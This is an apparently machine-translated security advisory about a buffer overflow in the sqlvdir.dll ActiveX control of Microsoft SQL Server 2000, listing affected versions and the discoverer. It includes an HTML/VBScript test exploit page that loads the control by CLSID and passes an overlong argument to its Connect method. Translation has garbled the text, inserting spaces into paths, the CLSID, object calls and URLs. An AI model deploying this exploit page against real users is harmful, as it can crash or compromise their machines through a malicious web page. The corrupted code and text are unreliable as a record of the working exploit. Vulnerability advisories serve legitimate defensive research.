Affected Systems:
Microsoft SQL Server 2000 SP4
Microsoft SQL Server 2000 sp3a
Microsoft SQL Server 2000 sp3
Microsoft SQL Server 2000 sp2
Microsoft SQL Server 2000 sp1
Microsoft SQL Server 2000
Description:
BugTraq ID: 31129
Microsoft SQL Server is a popular SQL database system.
The sqlvdir. DLL ActiveX Control (default path: C: \ Program Files \ Microsoft SQL Server \ 80 \ tools \ binn \ sqlvdir. the isqlvdircontrol interface exposed by DLL, CLSID: FC13BAA2-9C1A-4069-A221-31A147636038 does not properly validate user input parameters, if the user is cheated to access a malicious web page and sends too long parameters to the method, this may trigger a buffer overflow and cause arbitrary code execution.
<* Source: beenu Arora (beenudel1986@gmail.com)
Link: http://marc.info /? L = BugTraq & M = 122115323714605 & W = 2
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<HTML>
Test exploit page
<Object classid = 'clsid: FC13BAA2-9C1A-4069-A221-31A147636038 'Id = 'target'> </Object>
<Script language = 'vbscript'>
Targetfile = "C: \ Program Files \ Microsoft SQL Server \ 80 \ tools \ binn \ sqlvdir. dll"
Prototype = "sub connect ([byval szserver as variant], [byval szwebsite as variant])" membername = "Connect"
Progid = "sqlvdirlib. sqlvdircontrol"
Argcount = 2
Arg1 = "defaultv"
Arg2 = "http: // test/te? S \ test \ tes \ ttest \ test \ Te @ ST \ tes \ test \ tes. \ ttest \ test \ tes \ test \ te. s \ ttest \ test \ tes \ t \\\\\\\\:# $ % test \ te? S \ test \ tes \: $ % \ ttest \ test \ Te @ ST \ tes \ test \ tes. \ ttest \ test \ tes \ test \ te. s \ ttest \ test \ tes \ t \\\\\\\\\:% % test \ te? S \ test \ tes \: $ % \ ttest \ test \ Te @ ST \ tes \ test \ tes. \ ttest \ test \ tes \ test \ te. s \ ttest \ test \ tes \ t \\\\\\\\\:% % test \ te? S \ test \ tes \: $ % \ ttest \ test \ Te @ ST \ tes \ test \ tes. \ ttest \ test \ tes \ test \ te. s \ ttest \ test \ tes \ t \\\\\\\"
Target. Connect arg1, arg2
</SCRIPT>
Suggestion:
Vendor patch:
Microsoft
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.microsoft.com/technet/security/